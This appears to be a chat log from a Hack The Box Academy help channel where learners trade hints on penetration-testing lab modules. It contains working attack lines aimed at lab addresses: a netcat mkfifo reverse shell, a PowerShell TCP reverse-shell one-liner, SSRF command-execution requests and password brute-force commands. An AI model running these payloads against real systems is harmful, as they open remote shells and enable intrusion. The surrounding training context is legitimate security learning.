yes, I know that. Since WE set the academy.htb to an IP in hosts, then they are identical. Since we set it to be the same, how does that prove that they were always the same? That's what the section seems to say
no, do the experiment I said and please tell me what happens
how I answer your question depends on what kind of result you get back
ok, let me test
they may just be using a shitty example and if they are then my explanation wont make any sense
Anyone available to ask a question regarding Attacking Services - Hard Lab. Just completed but quite confused on a step as to why it works. Let me know
are you saying you are confused to why it works or if someone else is confused then ask you?
I am confused as to why the attack chain works when initial key element returns a value of 0 @analog tendon
I get the same result if it is academy.htb or blah.xyz if I set both to the same IP in hosts
then they're using a lame example
the idea is that the server can be configured to serve a specified vhost, and it may serve a default one with just the IP address, but redirect to the proper stuff depending on which vhost it receives from a browser.
but in this case, the academy domain and the default page are the same, so you see no difference
the linked server part right?
I dont even think they are touching on vhosts yet. It's a couple of sections ahead. It seems like they are saying "we just proved academy.htb is the same as our test IP". The previous sections the php page had a message that the admin panel moved to academy.htb
yeah and those are still considered vhosts in the server configuration
Hello, need help on the FILE TRANSFER module. I created a WebDAV server and can see it on my local PC. But when connecting from PowerShell with dir \\192.168.0.119\DavWWWRoot it says the path does not exist. Can anyone help?
@ripe grove basically just ignore it and move on
I will, I just wasn't sure if I was misunderstanding something. it seems the section just needs a rewrite
yeah the point they were trying to make isnt relevant for the lab
pretend that if you accessed the IP directly you got the apache default page and you didnt get the site until you added academy to etc/hosts
well that's the vhost section
well thanks all for confirming I wasn't crazy. I was very confused for a moment
could someone help me on file uploads - type transfer? I've got files uploaded but it's treated as an image not a webshell ||I was using one of the jpg MIME types and fuzzed for acceptable extensions, but haven't gotten anything to work||
Yes
I spent majority of time elsewhere because the value was 0. Eventually gave it a try and got the flag
if you need help with the commands, try this https://donsutherland.org/crib/imap
I may not be understanding it right, but I put it in the same place as being a domain admin but within the database. As long as you can run as admin within the domain you can run files on other machines within the domain, and since they're linked then it's like they are their own domain. The thing that killed me on that one was the syntax. They didn't explain it too well and I had to look elsewhere to figure out how to put the syntax properly.
u can dm if u want I have completed that module
Yes but impersonating said user returns a value of 0, which is false
That threw me off
on the linked server? or on the server you could access?
that's because he wasn't an admin on the server you could access. but if you were to bounce that same command after impersonating off the linked server he would have a value of 1
sorry, run the command on the linked server. not bounced
I understood that as, I have to impersonate as that user from server I am on before going to linked server
I think on the local server you were just supposed to see that you can impersonate J, but then if you checked to see if J was a DBA on local it would be 0 but he was DBA on linked
I was expecting
```
--------
user
(1 rows affected)
---->0
```
to be 1, and I also checked if he was sysadmin, never dbo.
Although, did see dbo by checking current user on linked server
oh well they were making it hard and confusing to just make it hard and confusing.
Yeah, after answering that question, who you can impersonate I did just that and saw 0
Hi guys, is this the correct channel regarding help with Starting Point labs?
and immediately scratched my head and started other attack vectors
no this is for modules in HTB academy
This is the correct channel -> #starting-point
thanks!
yea that stopped me up for a couple of hours. the other 4 hours was syntax issues
That last question lost me for good 4-5 hours lol
I went back to the beginning and re-enumerated everything
is anyone free for this?
I could not connect to db with sqsh to save my life
1 user needed a password change and user f*** was an incorrect password
mssqlclient worked just fine
I'll probably try to get a reverse shell instead of just reading the flag another day
Sqsh is broken on pwnbox/parrot
These modules have taught me 1 important lesson so far and that is Try multiple versions of the same exact tool, using exact same syntax
Evil-winrm/cme/impacket
Those are 3 Ive had issues with so far relating to versions
Since im on ubuntu I tend to keep my newer versions in /snap/ instead of /usr/bin
Did anyone else see an experimental interactive terminal pop up in academy? I checked it out...pretty freakin' cool! Way to go dev team!
Do you mean the PwnBox?
Yeah, it pops up when you start the pwnbox. I typically don't use the pwnbox and hadn't in a while, so I was a little surprised to see the addition of the integrated terminal. It's quite possible it isn't new but just new to me. Still, color me impressed.
can someone point me in the right direction? I'm in the nmap module on the final lab, I've searched and found 2 ports open, 22 and 80
but i'm unsure on how to proceed
Try scanning all ports
Also try -sU
i tried nc on both ports 22 and 80
waited for a while
try out curl /robots.txt
did it work?
port 20 just spat out SSH version
port 80 just spat out what curl would about the webpage/server
no flag
bro
curl http://ip/robots.txt
Also to bind to a port you need to run as root/sudo
--source-port
The question is asking the version of the service. The -sV flag does just that
no, it needs the flag
from shell
It's expecting something: but they're not finding the right port
yeah, that's the right one
i think the version is the flag if i remember right
there must be specific port
But also this lab specifically, is where the firewall evasion techniques come into play
using --source-port 53 in a new nmap scan
i've been on it so long the vm ran out of time and died lol
This is why it's recommended to run it on your own vm
how is it going now? xd
i realised i was missing the source port because its specified that its used to basically trick the firewall or IDS/IPS
cool
would you like to become accountability buddies?
thanks for this
anyone available and willing to help with the "attacking common services - DNS" ?
just added sudo and the correct port now i know it and got the flag
Just ask your question
ok
python3 subbrute.py inlanefreight.com -s /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -r resolvers.txt
I've run that and got a whole bunch of subdomains using "dig any"
and no flag to speak of
i dont get it
you might be thinking of the tool you used
the wordlist thing is a different module entirely
Maybe... I don't have my exact notes on that module, but there was one DNS module that used the fierce wordlist instead of the subdomains one
it's an earlier module
ok i could try that
or maybe it was using the tool fierce?
but the says use subbrute so
ahhh ok
pivoting module / skills assessment section
how do you transfer files to/from the ||172.16.5.35|| host? Files I want to transfer are too big to use the base64 trick. It is impossible on my first pivot to set up any http server for the transfer. I tried port forwarding so ||172.16.5.35|| can reach my attack box through my pivot machine, but it doesn't work (used msfconsole portfwd, maybe I should try chisel). scp doesn't work either. any ideas?
Subd 20k worked fine
with xfreerdp you can mount a directory from your system to the rdp system; check the man page for xfreerdp to see the syntax
damn. that's concerning, seeing how I've tried that one
Honestly, double check your ports etc
ok, will do
can i have a nudge on passwords attack medium
Like I am confused where to start
I see SSH and SMB open on the box -- like do they want me to bruteforce again?
that module is all about different password attacks and brute forcing. Use what you've learned you're on the right track
if you need more help feel free to dm me
hey all. Dumb question but I was doing the Linux Fundamentals module, section Network Services. I figured out the type of services by ||running cat on syslog.service||. I was wondering if you can look up this info with a systemctl command or such?
You start with SMB and do a lot of back and forth, by far the best module that has you practice all the things
Hi, I'm trying to hack a machine but in my company there is a firewall and it is blocking my connection, does somebody know how I can bypass it?
Ask the system administrator of your company. He can help you
okay
this page is for module related stuff...not semi illegal (grey area) etc. A bit surprised you have asked this here!
ok again this is for module related stuff, anyone with an ounce of common sense will not illegally hack for you... go to the police and report it.
Hello is this group for helping with academy lab?
yes it is. Anything Academy module related.
I struggle with INFORMATION GATHERING - WEB EDITION part Active Subdomain Enumeration
Question : Find and submit the contents of the TXT record as the answer.
Should I do footprinting from the start as recommended?
i dont wanna report it
Brill.... may i suggest you then find a channel willing to help you. Because this isnt the place, it is for module related stuff.
I do not have my notes with me, hopefully someone will be able to answer it, but always go from the start, to get as much information.
... if you haven't even tried, no point in looking for guidance. Always try what you know first before looking for guidance
Can any one give me a hint on Attacking Common Services, Attacking SQL Databases? I have the users password but cant log in with it. I have tried all of the other suggested attacks in the module; not sure what to do next?
MSSQL iirc
Hello, can somebody help me with the Web Attacks skills assessment module? I get what the admin username is, but don't know how to change his password, it says Access Denied to me. I was trying HTTP verb tampering and to change the uid, probably the problem is in the token, but I can't decipher it. Could someone DM me for help? Thanks in advance
Yes.
does any one have microsoft 365 license key
This isn't the place to ask for that, also as O365 is a sub based service-based on account someone just having a key is just silly. Especially if you get that key, they'll still be able to tamper with your account
Any "key" is going to be a cracked key and illegal :)
oh thanks for the info
Question for **Windows Priv Esc PILLAGING** - Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer. - Could someone point me in the right direction? I'm running as user Jeff as admin and still get access denied when getting the backup.
do zonetransfer
You can copy and paste files within an RDP session using both mstsc and xfreerdp. That's probably the easiest option, though I strongly recommend getting familiar with other terminal-based file transfer methods. If you haven't already, you should definitely check out the File Transfers module - it's very well done:
https://academy.hackthebox.com/course/preview/file-transfers
I'm doing the Hacking Wordpress skills assessment, but my API keys from the DB are not working, thus can't find more info about the vulnerable plugin. I know what the plugin is, but not sure which exploit to use, can someone confirm if it's the same one from the instruction's example : wp_admin_shell_upload
the api key from wpscan?
hm
Yeah, it does not seem to work, I made 2 accounts already
what flag are you using in wpscan to declare the key?
--api-token
Be sure to ||turn off the AV||.
Hello,
module getting started, knowledge check page.
I want to ||upload a shell, how do you make flash work?||
Thank you.
define "flash work"
a button uses swf to launch a form, that can upload stuff.
are you sure that this is the correct way?
<object id="SWFUpload_0" type="application/x-shockwave-flash" data="template/js/uploadify/uploadify.swf?preventswfcaching=1678962077688" class="swfupload flpl_initiated" style="position: absolute; z-index: 1;" width="100%" height="25"></object>
I am sure it is A correct way.
Source: https://attackdefense.com/challengedetailsnoauth?cid=14
look at the hint and think about your approach
thank you, I may have to curl my enthusiasm
Thanks for the answer. I did that module. Tried various methods. Maybe my port forwarding sucks.
Because the Windows host is connected to the first Linux machine I set up on my first pivot
portfwd add -R -l 80 -p 80 -L <IPaddressofAttackBox>
Of course I didn't forget to run autoroute and socks in msf.
With the port redirection I should be able to download files on windows from my attack box wget http://PIVOT_IP_ADDR/script
I understand this should connect to the Linux machine on port 80, some magic will be done and ultimately my own host will receive the GET request. But it doesn't
Hmm, really stuck on the question: 'Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.' in 'Hacking WORDPRESS' -- Can someone give me a hint, whether I need to use metasploit somehow, or can I somehow get the answer from the vulnerability I found containing word: ajax
I can open the file /etc/passwd, but that does not seem to help me at all
Read the question correctly. "Use a vulnerable plugin"
A shell is of absolutely no use to you here
Look at all installed plugins and search with the search engine of your choice for <plugin name> and unauthenticated file download.
Thanks, I'll give it a shot
Got it, thank you! Was looking at the wrong vulnerable plugin at first :>
Copy and paste never focking works in the browser pwnbox
you can use the copy-paste box that is integrated into pwnbox
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
How am I supposed to do this? Aren't regexes and tens of pipes a bit too hard for an easy module? Tbh, I hate to manually write things like that for free, it takes a lot of time and debugging and I will still forget it tomorrow
you can literally use the commands from the examples
plus the ones from the cheatsheet
What example command? I have only one usage of curl on that page and its in the question
Hi everyone
AD Enumeration Skills Assessment Part 2
I'm trying to locate the configuration file containing the MSSQL string
I accessed the Department Share (via smbclient) with the user A... But every folder is empty.
I then tried to spider the complete 172.16.7.3 with
crackmapexec smb 172.16.7.3 -u A***** -p ***** -M spider_plus -o READ_ONLY=False
but the spider_plus doesn't finish. I always get a timeout error.
can anyone give me a hint, if I'm on the right track with the smb share and with the syntax of the spider
ty
There is basically an entire linux in cheatsheet lol, I don't know a single person that remembers all that awk can do
if you are not willing to remember tools then you should reconsider your skill/job path
as it is a crucial thing
You can ask about it guys like team leaders in google security, I can give you dc to some, they won't remember this shit too
if only you spent that energy into trying by yourself rather than complaining, you should have finished the exercise
I can't think anymore when i'm angry and frustrated, now I can only complain
find the solution to that problem
don't paste such stuff, check for white spaces or reach out to support
Hey guys, broken auth assesment here,
Anyone knows a wordlist for roles? I've been trying to get it for a day now.
Got user enum, got em cracked with rockyou and cracked the cookie.
I'm stuck in the pivot skills assessment. Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer. I found credentials for ||mlefay|| but I'm not able to log in anywhere. I also tried a ping sweep on the webshell via for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done but I keep getting ping: 172.16.5.{1..254}: Name or service not known. Could use some help.
I did that with msf ping_sweep. If nth responds restart machine
Alternatively u can run Nmap through the proxy and scan the entire network for ssh & rdp. But it will take forever
Can I DM you? I seem to be missing some steps, but i can't identify which.
$ curl -s https://www.inlanefreight.com | grep -oiE "www.inlanefreight.com/*[^'\"\ \?\\t\%]+/" | sort -u
www.inlanefreight.com/index.php/
www.inlanefreight.com/index.php/career/
www.inlanefreight.com/index.php/feed/
www.inlanefreight.com/index.php/news/
www.inlanefreight.com/index.php/offices/
www.inlanefreight.com/index.php/wp-json/
www.inlanefreight.com/index.php/wp-json/oembed/1.0/
www.inlanefreight.com/index.php/wp-json/wp/v2/pages/
www.inlanefreight.com/wp-includes/
www.inlanefreight.com/wp-includes/css/
www.inlanefreight.com/wp-includes/js/
www.inlanefreight.com/wp-includes/js/jquery/
Still wrong answer though, things like that are often a lot harder than it looks, cause you have to kinda guess what the creator considers as a valid path, or what can slip under your filter, certainly it shouldn't be rated ez imo, there are security ppl who don't know linux or terminals at all or just starting.
No worries, glad to help. Have you done the pivot skill assessment already by any chance?
any help please for the skills assessment of SQLMap Essentials, I got the exact complete flag but it said incorrect
(sad face)
no missing space, it's clearly the same
Please help on Linux privesc skills assessment in getting the flag1.txt i see the history of htb-student but the flag1 is absent in /var/www/html. What am I doing wrong? thanks in advance
Could i DM someone about Attacking Common Services - Attacking DNS? I'm stuck and idk what else to do :/
**Could I DM for this please**, spent 24 hours
anyone able to give me a hint for protected files question in the module password attacks? SSH brute force is taking forever...
Hello guys. I'm struggling to get the final answer from Credential Hunting in Windows. The hint is talking about Ansible... Can anyone give me some tips?
What are the credentials to access the Edge-Router? (Format: username:password, Case-Sensitive) - Question
Nah man it's cool!
I think SQLMap has been one of my favorite modules. I learned a ton of new features/options I didn't know existed
could i dm you?
I'd create an account with WPScan and get a free api-key you can use for your scans. Gives a lot more information
It may not be needed but doesnt hurt
Hello, can I ask a question regarding Attacking Common Services hard?
I found that there is one SMB share that I can access but when I try smbmap it gives me an authentication error..
nvm
figured out
sure
try smbclient
ty
socks5 tunneling with chisel: I can't execute chisel on the pivot host because some libraries are missing, how do I fix that?
Use 1.6.0
That module is an absolute mess.
@rustic sage yeah that worked thanks! Saved me a lot of time
can anyone help me with Attacking common service hard? I will dm for specific question
That one is also terrible. What do you need?
can i dm you?
No worries, you'll probably hit some more crap ||with the ptunnel-ng BS||, like i said the module is a mess.
Sure.
can someone help me with the footprinting module footprinting lab -medium: Enumerate the server carefully and find the username "HTB" and its password. I think I found the MSSQL Password but when I enter it I get an error saying that it could not connect
you can dm me
Anyone else having issues RDP'ing into the Windows machine on the 'Introduction to Active Directory' module for the 'Guided Lab' sections at the end? I can RDP into the Windows machines in the 'Windows Fundamentals' module just fine. When I do the former, an xfreerdp window appears but it remains blank and then the connection closes with error message of 'ERRINFO_LOGOFF_BY_USER'
anyone here finish the medium lab for password attacks? Need a nudge
could someone help me with the file upload skills assessment? I know what I have to do, but I'm struggling to achieve it
you can dm me
I'm not familiar with that error, but with AD modules it's best to give it 5 minutes to fully boot before trying to RDP in.
You can dm me if you still need help
Anyone want a study partner for Academy with goal of getting CPTS?
I am working on the Nibbles practice box and I have a question about the reverse shell used in the course to gain root. I can't find much information or where the shell came from, but why is this one used: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f
feel free to DM if someone can help me understand
I feel so dumb... I'm on Windows Fundamentals cause I want to do all modules, but idk what I need to put as the version in the second task on page 1... I got the version with PS with Get-WmiObject, from the registry key ProductType, from systeminfo, full name, shortcut, number, all bad. This question: Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive). What's the format of the answer for the validator?
well, I haven't done it there but the question says it. Windows X and it's case sensitive
I tried all combinations already. It drives me nuts
why would you try all combinations and not the correct one
take care of spaces n such too
cause the correct one is validated as wrong. I'll come back to it, thanks
It almost certainly isn't
not module/academy relevant
Fair enough
I can give you a nudge, but I don't remember what wordlists I used
generally for that module you use either the mutated list, the unmutated list, and rockyou
^^
Ok ! Ill try the rockyou.
could I DM someone about file upload skill assessment? ||my shell is uploading, but I still get a 404 when navigating||
Can i have a sanity check for "HTTP Response Splitting" in module: "HTTP ATTACKS " ? In particular about 'admin report' functionality, it doesn't work even with basic redirection
What's this awesome thing academy just added
https://academy.hackthebox.com/my-badges
have you tried cyberchef or burpsuite?
copy the url to cyberchef and choose the settings for it
at least I'm 99% sure cyberchef does url decoding, quick google search will give you the results
sure
DM if you are still stuck
Hello, I'm having an issue with the in browser instance and getting to the target. I've tried googling, and looking through some of the support posts. Sorry if this is the wrong place to ask, I started yesterday. Can someone point me in the right direction?
hey my friend had similar issue try respawning target in the academy page , make sure your VM is configured / SSH
Thank you for the suggestion. That could be my issue, I was under the impression for the in browser instances, I didn't have to configure anything. I'm on the academy side of things if that makes any difference.
hey does anyone know how to install proxychains or anon surf on kali? for some reason I don't know why it is not working, used it a million times and now all the sudden it is not working
The badges look really cool.
Is there any way to output the badges with the real name? Like with the Student Transcript?
I want to flex all the modules I've done
Like it would be cool to show completed academy stuff on main HTB platform
Can someone help?
If you enumerated and went through everything you'll have it
Should I use some resources from the previous subjects?
Everything you need should be in the module iirc
Can I send u a DM?
When I first completed the assessment I used SSH Dynamic Port Forwarding to chain proxies, then went back and did the same with chisel. Been trying to avoid using metasploit though I may go back through and try that as well.
Not at my computer
I can't understand what a personal machine instance is, can someone explain it to me?
anyone online?
Hard to say without the exact context. They are probably referring to a machine instance that is provided only for you (no other HTB users are sharing the instance so you won't have to contend with anyone else while attacking the machine, come across files/exploits they have left around, or deal with changes they've made to the box while exploiting it). It's also possible that they are referring to your own Attackbox rather than the Pwnbox. For instance, if you use VirtualBox with a Kali/Parrot VM, or VMware with a Kali/Parrot VM, etc.
I understand, thank you.
Can anyone help me out, I'm having difficulty finding the target's hostname while doing an NMAP scan
What module are you in?
Module 19, I'm looking everywhere for an NMAP command that will specify a target's hostname
I don't know which one 19 is, but you can try --packet-trace and see if it's returned in the communication. Or you may have to enumerate one of the services that are detected in the scan.
Enumerate the hostname of your target and submit it as the answer.
this is what it's wanting me to do
What is the command you are running?
I'm trying a few things
I'm running -A now
Performs OS Detection, Service Detection, and traceroute scans.
Is this the Network Enumeration with Nmap module?
Np, did you try -sV -sC or -O before that?
#command injection
- 1 Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?
the answer is: 25, why is it wrong?
Because the first bits of lines aren't the html code
how could i do for that ?
Look where the "<!--Doctype" starts or for <html>
You do have the code but the first 21ish lines look like that's just your proxy request
I haven't seen the result
#Command injection
- 1 Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
what's up hackers
Module: Server Side Attacks Section: SSRF Exploitation Example
Can someone provide a nudge on the command for accessing the root directory? I thought I was in the root directory already via:
curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"
curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=dir"
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 139
Server: Werkzeug/2.0.2 Python/3.8.12
Date: Thu, 16 Mar 2023 19:15:39 GMT
<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=dir</h1><a>index.html internal.py internal_local.py start.sh
</a></body></html>
10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=<Not sure of command?>
if you can run commands maybe try for a reverse shell?
When I encode the characters for the command, I get the following message:
"URL can't contain control characters."
what are you using to repeat burp?
Try something like ....// For directory traversal
Yes. I was using burp even though there wasn't mention of it for this section of the module. The question, "Replicate what you learned in this section to gain code execution on the spawned target, then look for the flag in the root directory and submit the contents as your answer." recommended to use the rce script. That script also returns the following error when I attempt:
"bash: syntax error near unexpected token `>'"
I think I am doing something wrong.
In the Password Mutations section of password attacks module. I am trying to use hydra to bruteforce the ssh creds. For the life of me I can't get hydra to work. Any thoughts? I've tried explicitly specifying the username, and then trying a username.list file, nothing seems to stick.
argh... disregard.. using the -p instead of -P for password list :S
leaving it for anyone who falls into the same trap.
Question about basics. I'm doing the "getting started" module. In the questions it states that you spawn the target. Goal is to do an NMAP scan on the target. So do I scan the VM I spawned or is there a target in the VM network I should scan?
So scan the local machine or scan some other IP that I should locate?
Bit confused because on previous question the version of VM's SSH banner was newer than the answer of the question.
Working on the Secure Coding 101: Javascript module and stuck on #4 in the assessment (/Reverse). Anybody have tips/tricks or help they can give? I have it unpacked and think I understand several of the pieces (the array, the inverted b64, the URL decoder). Just a bit lost on figuring out what to change. Been going at it for days now
There should be a separate target that you spawn. It will say "click here to spawn target" or something like that in bright green text right above the questions. So you spawn the target, then once it loads it provides an IP address for you to scan. hope that helps!
Module: Server Side Attacks
Section: SSRF Exploitation Example
I cannot locate the flag within the files rendered:
curl -i -s "http://10.129.189.132/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=ls%252520-lha%25250A%250A"
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 407
Server: Werkzeug/2.0.2 Python/3.8.12
Date: Fri, 17 Mar 2023 05:12:01 GMT
<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=ls -lha
</h1><a>total 24K
drwxr-xr-x 1 root root 4.0K Nov 1 2021 .
drwxr-xr-x 1 root root 4.0K Nov 1 2021 ..
-rw-r--r-- 1 root root 84 Oct 28 2021 index.html
-rw-r--r-- 1 root root 1.2K Oct 28 2021 internal.py
-rw-r--r-- 1 root root 655 Oct 28 2021 internal_local.py
-rwxr-xr-x 1 root root 69 Oct 28 2021 start.sh
There's no flag in the above. Can someone dm me please?
dm me if u want
I'm having issues with the following module: Getting Started, and section Pentesting Basics (Public Exploits). I have tried nmap, wpscan, gobuster, searchsploited every installed wordpress plugin and even tried to run some of the found xmlrpc exploits with no luck. Can someone point me in the right direction and NOT provide the answer?
Search for plugin exploits
I already did. Found the following: xmlrpc and wp-cron,
Tried about all of the associated exploits related to xmlrpc and wp-cron with no luck
I forgot to mention simple backup for wordpress
you are half way there
for Password attacks: attacking ad and ntds.dit
I am not able to get crackmapexec to work. I am using the following command and I get NO output as if the command is not even running. It also doesn't work with rockyou. And updating crackmapexec did not work. Pls send help
crackmapexec smb 10.129.202.85 -u jmarston -p /usr/share/wordlists/rockyou.txt
--local-auth maybe?
will try, thanks
on top of that make sure that your wordlist is not compressed, e.g. rockyou.txt.tgz
Forget it. I'm so blind. I tried to see the situation in the most complicated way... Ty for the tip
how do i hack blox fruits
i must be missing something....What is the name of the security regulation for credit card payments a company must adhere to...... I thought it was PCI or PCI DSS but it says I'm wrong.....what am I overlooking?
never mind... I needed the "-" in the answer
Hi, Need some hints
Module : Footprinting
Section: SMTP
Ques: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I'm using HTB client for this question, I have the footprinting-wordlist.txt
smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t 10.129.191.181 -v
Getting all 101 payloads, no result
msfconsole - I tried auxiliary(scanner/smtp/smtp_enum - No result
Keep in mind that a mail server sometimes takes a little longer to respond.
are you only using VRFY?
Did you figure it out? I am stuck in the same situation on that lab.
I managed to do it with msfconsole, give it another try, machine reset could help.
yes!
I tried many times by resetting the machine
but it shows all payloads are no result!
personally i used this
worked really well
Thanks, I will try again
or metasploit scanner/smtp/smtp_enum scanner
idk why but smtp-enum didn't work that well for me
pivoting tunneling. Skills Assessment. I know the ||dns(probably DC)|| but how do I reach it?
Did you extend the time (query timeout)?
@livid zephyr yes, I did, you can dm if you're still stuck
dm me if u want
In SQLMAP essentials I cant find the right place to hit. Anyone able to point me in the right direction.
if you're talking about the skill assessment you can dm me
coucou
I'm doing HTB wordpress skill assessment, for some reason when I try wpscan it says it can't scan the website because it seems like the website is not using wordpress?????? how fix
like ik it has wordpress on it, idk why the scan just isn't working
Hey I need help for Attacking Common Services > Attacking Email Services I have found m** user but I am struggling with logging in as I am unable to login to all three services. Any help?
Stuck on these for a while now Need help on,
Attacking common applications SA 1 - last question.
Found vulnerability but not able to exploit it.
Attacking common applications SA 2 - last question.
Got proper shell but couldn't find flag.
u can dm me
Hello there, have some troubles with the ATTACKING ENTERPRISE NETWORKS module
at Exploitation & Privilege Escalation... can't get reverse shell, doing all the steps but can't get it... maybe some help around here?
you probably have to adjust your vpn settings
Remember you have to re-download the vpn file if you change connection settings on host
Hello, I have a problem with the Meterpreter Tunneling & Port Forwarding module. In the Configuring MSF's SOCKS Proxy section, I try to do the same, but when I execute it, the following message appears. I have tried several times following the previous configurations, but I don't know what I could be doing wrong.
Hello. Go back a few chapters when you had tasks regarding "Backup Operators" privileges.
Hi just getting back to this. it's LHOST tun0 LPORT 4444
Hey
I had this problem several times today.
I've had to reboot a new machine 10 times now and I can't get an RDP connection.
Others have had this problem?
No problem with remmina.
Hey
I am stuck with the firewall and IDS/IPS evasion - easy lab. Can someone help me with it. U can DM me
I just created a Team if any new members want to join the Team you are welcome https://ctf.hackthebox.com/event/details/cyber-apocalypse-2023-the-cursed-mission-821
wrong channel
anyone have issues with the powershell oneliner - powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Hey i am a beginner and trying to make a team for future CTF's
nobody cares, this is for modules and academy discussion only
av is off - I just get PS errors
where can i post the link to get members please tell me
Its my first time using a discord so i don't know a lot
Hey Guys!! I need please some help with Skill Assessment - Broken Authentication, I am stuck for 2 days..
dm
hey guys i hope everyone is doing well, i just wanted to ask if cubes expire if i get them from a subscription
Cubes do not expire
Hey, need help on AD Enumeration & Attacks - Skills Assessment Part II, I'm on question 7:
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I found the creds nb:D_**_*****, but don't know how to login to the host. anyone here to give a hint or nudge? I tried to use mssql but I couldn't log in
Can someone help me with 2 questions from the "intro to networking" module? It's asking me to split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer. I put in 10.200.20.63 and got the answer wrong. The next question is the same thing except i need to submit the broadcast address of the 2nd subnet
HTB Attacking common application osTicket
I'm not sure what I'm supposed to do here. anyone want to give me a hint? I tried the users they gave in the example but they weren't working
Hey everyone, I've been stuck on the Print Operators section of the Windows Privilege Escalation module and was wondering if anyone was willing to point me in the right direction. I'm currently trying to bypass UAC to get an elevated console and be able to see if a user has the SeLoadDriverPrivilege privilege. The bottom of the module said that there are tools in c:\tools\ but I don't see anything that could help with that. I also started to mess with trying to compile UACMe but that's a whole mess trying to do on a Linux VM. I feel like I'm overlooking something.
Hello all! Someone to help me with what I'm doing wrong with my payload in Code Injection - Skill Assess?
with my*
?
can I dm someone? I know I'm sooooo close
I'm having some issue with the easy lab in Password Attacks. I can't seem to get in using either open service. I've tried the hints provided here and in the forum. Nothing has worked so far. I've tried using ncrack, crackmapexec, and hydra and they never find anything or just take way too long to complete.
hello I am trying to scan for subdomains of subdomains using vhost methodology however it does not find even ones I know for sure are valid. Any idea why?
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -w enumddomains:FUZZ2 -u http://inlanefreight.local -H 'Host: FUZZ.FUZZ2.inlanefreight.local' -t 1300 -timeout 100 > subdomain-scan-full2
Passwords are still the primary method of authentication in corporate networks. If strong password policies are not in place, users will often opt for weak, easy-to-remember passwords that can often be cracked offline and used to further our access. We will encounter passwords in many forms during our assessments. We must understand the various ...
I did it!
Yoooo
I don't think this module is as bad as some people made it out to be
Welcome to the club
People are just impatient
Like overall it took a few tweaks to fine tune
there were like 2 sections that were kinda bad
but the rest of the module was really good
The skills assessments were a blast
anyone available for File Uploads - Skill Assessment? I'd prefer to DM to avoid spoilers. I'm on the last part of the skill assessment and don't know why something isn't working
dm if still working on it.
What modules do you recommend learning to help me with the reversing category for HTB CTF? I'm new to HTB Academy as well
I don't think Academy gets into reversing. The buffer overflow modules could help with the pwn category.
The assembly module would be another good one that would also help with reversing
A bit tricky but I solved the section
anyone know other virtual machine alternatives for mac m1 besides, fusion player, virtual box, and utm?
that's about it for M1 unless you go Parallels, since M1 is based on ARM and there isn't a lot of ARM based VM utilities out there currently
And ARM isos that aren't architect
from that module the section I didn't like was password mutations, had to sed the wordlist
That section was horrible
It took forever
Ignoring a couple of bad sections the module was great tho
Login bruteforcing skills assessment is quite similar
jaja
but if you need help in any module I've completed dm me
let me know if you're still stuck..
Hello, after two days I'm still stuck in finding the last flag of the sqlfundamentals module, can anyone give me a clue where I'm going wrong?
Can i dm?
tamper script is wrong
also I suggest you increase your risk and level.. and tune your attack a little bit more
k
Just arrived at Password Mutations in the Password Attacks module and I must say that I'm so disappointed in HTB.
This kind of question that takes so much time to brute force an ssh password teaches you nothing and takes so much timeeee
Instead of teaching people new stuff you are WASTING their time on bullshit, so DISAPPOINTED by you.........
Maybe this post would have helped you
|| you can cut the first 17000 password in the Mutated wordlist and if ssh is too slow you can brute force the ftp with same user||
what does --local-auth mean? I read the man page, it says authenticate locally to each target but I don't quite understand what this means
You can either log in with a local user account or with a domain account.
For example, administrator. This account exists by default in the domain as well as locally.
But they are different accounts.
With --local-auth you say that you want to use the local account.
OK, thank you very much for the advice. Now I refine the attack a little more.
ah ic thanks
I'm getting a really weird issue on the Password Attacks Module - Network Services Questions. for the box, using nmap, I found ||NFS ||to be open. Not sure if this is the way in, but trying ||to mount NFS||, gives the permissions to the mounted folder to user '4294967294' and I'm unable to access it locally. Been at this for a few hours, any idea what this is?? If this isn't the way in let me know and I'll abandon this but I quickly tried accessing other open ports anonymously and get ACCESS DENIED everywhere... EDIT: I went back to the Footprinting Module that covered this method and port and was able to access right away. The version over there was 4.2, the version for this module/question is 3 - would that have anything to do with it?
you can dm me if you can't get the tamper script correct
